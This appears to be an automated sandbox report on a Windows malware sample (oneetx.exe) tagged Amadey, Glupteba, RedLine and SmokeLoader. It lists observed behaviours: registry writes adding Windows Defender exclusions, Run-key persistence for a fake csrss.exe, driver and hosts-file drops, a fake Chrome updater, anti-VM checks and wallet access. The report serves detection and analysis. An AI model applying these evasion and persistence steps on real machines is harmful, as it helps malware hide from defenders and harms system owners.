Malware Analysis Report

2025-08-06 03:39

Sample ID 230702-ajgeysbc4z
Target oneetx.exe
SHA256 563acabe49cc451e9caac20fae780bad27ea09aaefaaf8a1dfd838a00de97144
Tags
amadey gcleaner glupteba redline smokeloader 280623_rc_11 up3 backdoor discovery dropper evasion infostealer loader persistence rootkit spyware trojan upx
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V6

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

563acabe49cc451e9caac20fae780bad27ea09aaefaaf8a1dfd838a00de97144

Threat Level: Known bad

The file oneetx.exe was found to be: Known bad.

Malicious Activity Summary

amadey gcleaner glupteba redline smokeloader 280623_rc_11 up3 backdoor discovery dropper evasion infostealer loader persistence rootkit spyware trojan upx

Amadey

Glupteba

Glupteba payload

GCleaner

SmokeLoader

RedLine

Amadey family

Suspicious use of NtCreateUserProcessOtherParentProcess

Windows security bypass

Modifies boot configuration data using bcdedit

Stops running service(s)

Downloads MZ/PE file

Possible attempt to disable PatchGuard

Drops file in Drivers directory

Modifies Windows Firewall

Loads dropped DLL

Executes dropped EXE

UPX packed file

Windows security modification

Checks computer location settings

Accesses cryptocurrency files/wallets, possible credential harvesting

Adds Run key to start application

Checks installed software on the system

Manipulates WinMonFS driver.

Manipulates WinMon driver.

Drops file in System32 directory

Suspicious use of SetThreadContext

Launches sc.exe

Drops file in Windows directory

Drops file in Program Files directory

Checks for VirtualBox DLLs, possible anti-VM trick

Unsigned PE

Program crash

Enumerates physical storage devices

Suspicious use of FindShellTrayWindow

Uses Task Scheduler COM API

Suspicious use of WriteProcessMemory

Suspicious behavior: EnumeratesProcesses

Modifies system certificate store

Modifies data under HKEY_USERS

Suspicious behavior: MapViewOfSection

Creates scheduled task(s)

Kills process with taskkill

Suspicious use of AdjustPrivilegeToken

Suspicious behavior: LoadsDriver

Suspicious behavior: GetForegroundWindowSpam

Checks SCSI registry key(s)

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2023-07-02 00:14

Signatures

Amadey family

amadey

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2023-07-02 00:14

Reported

2023-07-02 00:17

Platform

win7-20230621-en

Max time kernel

144s

Max time network

154s

Command Line

C:\Windows\Explorer.EXE

Signatures

Amadey

trojan amadey

GCleaner

loader gcleaner

Glupteba

loader dropper glupteba

Glupteba payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

RedLine

infostealer redline

SmokeLoader

trojan backdoor smokeloader

Suspicious use of NtCreateUserProcessOtherParentProcess

Description Indicator Process Target
PID 1044 created 1204 N/A C:\Users\Admin\AppData\Local\Temp\1000187001\updChrome.exe C:\Windows\Explorer.EXE
PID 1044 created 1204 N/A C:\Users\Admin\AppData\Local\Temp\1000187001\updChrome.exe C:\Windows\Explorer.EXE
PID 1044 created 1204 N/A C:\Users\Admin\AppData\Local\Temp\1000187001\updChrome.exe C:\Windows\Explorer.EXE
PID 1044 created 1204 N/A C:\Users\Admin\AppData\Local\Temp\1000187001\updChrome.exe C:\Windows\Explorer.EXE
PID 1044 created 1204 N/A C:\Users\Admin\AppData\Local\Temp\1000187001\updChrome.exe C:\Windows\Explorer.EXE
PID 1764 created 1204 N/A C:\Users\Admin\AppData\Local\Temp\1000187001\updChrome.exe C:\Windows\Explorer.EXE
PID 1764 created 1204 N/A C:\Users\Admin\AppData\Local\Temp\1000187001\updChrome.exe C:\Windows\Explorer.EXE
PID 1764 created 1204 N/A C:\Users\Admin\AppData\Local\Temp\1000187001\updChrome.exe C:\Windows\Explorer.EXE
PID 1764 created 1204 N/A C:\Users\Admin\AppData\Local\Temp\1000187001\updChrome.exe C:\Windows\Explorer.EXE
PID 1764 created 1204 N/A C:\Users\Admin\AppData\Local\Temp\1000187001\updChrome.exe C:\Windows\Explorer.EXE
PID 1576 created 1204 N/A C:\Users\Admin\AppData\Local\Temp\1000187001\updChrome.exe C:\Windows\Explorer.EXE
PID 1576 created 1204 N/A C:\Users\Admin\AppData\Local\Temp\1000187001\updChrome.exe C:\Windows\Explorer.EXE
PID 1576 created 1204 N/A C:\Users\Admin\AppData\Local\Temp\1000187001\updChrome.exe C:\Windows\Explorer.EXE
PID 1576 created 1204 N/A C:\Users\Admin\AppData\Local\Temp\1000187001\updChrome.exe C:\Windows\Explorer.EXE
PID 1576 created 1204 N/A C:\Users\Admin\AppData\Local\Temp\1000187001\updChrome.exe C:\Windows\Explorer.EXE
PID 2764 created 1204 N/A C:\Program Files\Google\Chrome\updater.exe C:\Windows\Explorer.EXE
PID 2764 created 1204 N/A C:\Program Files\Google\Chrome\updater.exe C:\Windows\Explorer.EXE
PID 2764 created 1204 N/A C:\Program Files\Google\Chrome\updater.exe C:\Windows\Explorer.EXE
PID 2764 created 1204 N/A C:\Program Files\Google\Chrome\updater.exe C:\Windows\Explorer.EXE
PID 2764 created 1204 N/A C:\Program Files\Google\Chrome\updater.exe C:\Windows\Explorer.EXE
PID 2764 created 1204 N/A C:\Program Files\Google\Chrome\updater.exe C:\Windows\Explorer.EXE

Windows security bypass

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\System32\drivers = "0" C:\Users\Admin\AppData\Local\Temp\1000203001\3eef203fb515bda85f514e168abb5973.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\csrss.exe = "0" C:\Users\Admin\AppData\Local\Temp\1000203001\3eef203fb515bda85f514e168abb5973.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\windefender.exe = "0" C:\Users\Admin\AppData\Local\Temp\1000203001\3eef203fb515bda85f514e168abb5973.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\3eef203fb515bda85f514e168abb5973.exe = "0" C:\Users\Admin\AppData\Local\Temp\1000203001\3eef203fb515bda85f514e168abb5973.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\rss = "0" C:\Users\Admin\AppData\Local\Temp\1000203001\3eef203fb515bda85f514e168abb5973.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\csrss = "0" C:\Users\Admin\AppData\Local\Temp\1000203001\3eef203fb515bda85f514e168abb5973.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\windefender.exe = "0" C:\Users\Admin\AppData\Local\Temp\1000203001\3eef203fb515bda85f514e168abb5973.exe N/A

Downloads MZ/PE file

Drops file in Drivers directory

Description Indicator Process Target
File created C:\Windows\System32\drivers\etc\hosts C:\Users\Admin\AppData\Local\Temp\1000187001\updChrome.exe N/A
File created C:\Windows\System32\drivers\etc\hosts C:\Users\Admin\AppData\Local\Temp\1000187001\updChrome.exe N/A
File created C:\Windows\system32\drivers\Winmon.sys C:\Windows\rss\csrss.exe N/A
File created C:\Windows\System32\drivers\etc\hosts C:\Users\Admin\AppData\Local\Temp\1000187001\updChrome.exe N/A
File created C:\Windows\System32\drivers\etc\hosts C:\Program Files\Google\Chrome\updater.exe N/A

Modifies Windows Firewall

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\netsh.exe N/A

Possible attempt to disable PatchGuard

evasion

Stops running service(s)

evasion

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000201001\setup.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000186001\updEdge.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000187001\updChrome.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000202001\toolspub2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000202001\toolspub2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000186001\updEdge.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000187001\updChrome.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000203001\3eef203fb515bda85f514e168abb5973.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000186001\updEdge.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000187001\updChrome.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000203001\3eef203fb515bda85f514e168abb5973.exe N/A
N/A N/A C:\Windows\rss\csrss.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Program Files\Google\Chrome\updater.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe N/A
N/A N/A C:\Windows\windefender.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe N/A
N/A N/A C:\Windows\windefender.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\f801950a962ddba14caaa44bf084b55c.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\oneetx.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000201001\setup.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000201001\setup.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000201001\setup.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000202001\toolspub2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000203001\3eef203fb515bda85f514e168abb5973.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000203001\3eef203fb515bda85f514e168abb5973.exe N/A
N/A N/A N/A N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe N/A
N/A N/A C:\Windows\rss\csrss.exe N/A
N/A N/A C:\Windows\system32\taskeng.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe N/A
N/A N/A C:\Windows\rss\csrss.exe N/A
N/A N/A C:\Windows\rss\csrss.exe N/A
N/A N/A C:\Windows\rss\csrss.exe N/A

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Windows security modification

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\rss = "0" C:\Users\Admin\AppData\Local\Temp\1000203001\3eef203fb515bda85f514e168abb5973.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\csrss = "0" C:\Users\Admin\AppData\Local\Temp\1000203001\3eef203fb515bda85f514e168abb5973.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\windefender.exe = "0" C:\Users\Admin\AppData\Local\Temp\1000203001\3eef203fb515bda85f514e168abb5973.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\System32\drivers = "0" C:\Users\Admin\AppData\Local\Temp\1000203001\3eef203fb515bda85f514e168abb5973.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\csrss.exe = "0" C:\Users\Admin\AppData\Local\Temp\1000203001\3eef203fb515bda85f514e168abb5973.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\windefender.exe = "0" C:\Users\Admin\AppData\Local\Temp\1000203001\3eef203fb515bda85f514e168abb5973.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\3eef203fb515bda85f514e168abb5973.exe = "0" C:\Users\Admin\AppData\Local\Temp\1000203001\3eef203fb515bda85f514e168abb5973.exe N/A

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-3518257231-2980324860-1431329550-1000\Software\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\"" C:\Users\Admin\AppData\Local\Temp\1000203001\3eef203fb515bda85f514e168abb5973.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3518257231-2980324860-1431329550-1000\Software\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\"" C:\Windows\rss\csrss.exe N/A

Checks installed software on the system

discovery

Manipulates WinMon driver.

rootkit evasion
Description Indicator Process Target
File opened for modification \??\WinMon C:\Windows\rss\csrss.exe N/A

Manipulates WinMonFS driver.

rootkit evasion
Description Indicator Process Target
File opened for modification \??\WinMonFS C:\Windows\rss\csrss.exe N/A

Drops file in System32 directory

Description Indicator Process Target
File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Checks for VirtualBox DLLs, possible anti-VM trick

Description Indicator Process Target
File opened (read-only) \??\VBoxMiniRdrDN C:\Users\Admin\AppData\Local\Temp\1000203001\3eef203fb515bda85f514e168abb5973.exe N/A

Drops file in Program Files directory

Description Indicator Process Target
File created C:\Program Files\Google\Chrome\updater.exe C:\Users\Admin\AppData\Local\Temp\1000187001\updChrome.exe N/A
File created C:\Program Files\Google\Chrome\updater.exe C:\Users\Admin\AppData\Local\Temp\1000187001\updChrome.exe N/A
File created C:\Program Files\Google\Chrome\updater.exe C:\Users\Admin\AppData\Local\Temp\1000187001\updChrome.exe N/A
File created C:\Program Files\Google\Libs\WR64.sys C:\Program Files\Google\Chrome\updater.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File opened for modification C:\Windows\windefender.exe C:\Windows\rss\csrss.exe N/A
File created C:\Windows\Logs\CBS\CbsPersist_20230702001509.cab C:\Windows\system32\makecab.exe N/A
File opened for modification C:\Windows\rss C:\Users\Admin\AppData\Local\Temp\1000203001\3eef203fb515bda85f514e168abb5973.exe N/A
File created C:\Windows\rss\csrss.exe C:\Users\Admin\AppData\Local\Temp\1000203001\3eef203fb515bda85f514e168abb5973.exe N/A
File created C:\Windows\windefender.exe C:\Windows\rss\csrss.exe N/A

Enumerates physical storage devices

Checks SCSI registry key(s)

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\1000202001\toolspub2.exe N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\1000202001\toolspub2.exe N/A
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\1000202001\toolspub2.exe N/A

Kills process with taskkill

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-242 = "Samoa Standard Time" C:\Users\Admin\AppData\Local\Temp\1000203001\3eef203fb515bda85f514e168abb5973.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-511 = "Central Asia Daylight Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-251 = "Dateline Daylight Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-532 = "Sri Lanka Standard Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-571 = "China Daylight Time" C:\Users\Admin\AppData\Local\Temp\1000203001\3eef203fb515bda85f514e168abb5973.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-192 = "Mountain Standard Time" C:\Users\Admin\AppData\Local\Temp\1000203001\3eef203fb515bda85f514e168abb5973.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-662 = "Cen. Australia Standard Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-141 = "Canada Central Daylight Time" C:\Users\Admin\AppData\Local\Temp\1000203001\3eef203fb515bda85f514e168abb5973.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-591 = "Malay Peninsula Daylight Time" C:\Users\Admin\AppData\Local\Temp\1000203001\3eef203fb515bda85f514e168abb5973.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-631 = "Tokyo Daylight Time" C:\Users\Admin\AppData\Local\Temp\1000203001\3eef203fb515bda85f514e168abb5973.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-201 = "US Mountain Daylight Time" C:\Users\Admin\AppData\Local\Temp\1000203001\3eef203fb515bda85f514e168abb5973.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-622 = "Korea Standard Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-211 = "Pacific Daylight Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-122 = "SA Pacific Standard Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-331 = "E. Europe Daylight Time" C:\Users\Admin\AppData\Local\Temp\1000203001\3eef203fb515bda85f514e168abb5973.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-441 = "Arabian Daylight Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-162 = "Central Standard Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-471 = "Ekaterinburg Daylight Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-351 = "FLE Daylight Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-982 = "Kamchatka Standard Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-1021 = "Bangladesh Daylight Time" C:\Users\Admin\AppData\Local\Temp\1000203001\3eef203fb515bda85f514e168abb5973.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-871 = "Pakistan Daylight Time" C:\Users\Admin\AppData\Local\Temp\1000203001\3eef203fb515bda85f514e168abb5973.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-221 = "Alaskan Daylight Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-331 = "E. Europe Daylight Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-435 = "Georgian Standard Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-181 = "Mountain Daylight Time (Mexico)" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-582 = "North Asia East Standard Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-121 = "SA Pacific Daylight Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-1022 = "Bangladesh Standard Time" C:\Users\Admin\AppData\Local\Temp\1000203001\3eef203fb515bda85f514e168abb5973.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-531 = "Sri Lanka Daylight Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-241 = "Samoa Daylight Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-262 = "GMT Standard Time" C:\Users\Admin\AppData\Local\Temp\1000203001\3eef203fb515bda85f514e168abb5973.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-1042 = "Ulaanbaatar Standard Time" C:\Users\Admin\AppData\Local\Temp\1000203001\3eef203fb515bda85f514e168abb5973.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-104 = "Central Brazilian Daylight Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-692 = "Tasmania Standard Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-651 = "AUS Central Daylight Time" C:\Users\Admin\AppData\Local\Temp\1000203001\3eef203fb515bda85f514e168abb5973.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-365 = "Middle East Standard Time" C:\Users\Admin\AppData\Local\Temp\1000203001\3eef203fb515bda85f514e168abb5973.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-82 = "Atlantic Standard Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-31 = "Mid-Atlantic Daylight Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-962 = "Paraguay Standard Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-381 = "South Africa Daylight Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-931 = "Coordinated Universal Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-652 = "AUS Central Standard Time" C:\Users\Admin\AppData\Local\Temp\1000203001\3eef203fb515bda85f514e168abb5973.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-52 = "Greenland Standard Time" C:\Users\Admin\AppData\Local\Temp\1000203001\3eef203fb515bda85f514e168abb5973.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\napipsec.dll,-3 = "Microsoft Corporation" C:\Windows\system32\netsh.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-581 = "North Asia East Daylight Time" C:\Windows\windefender.exe N/A
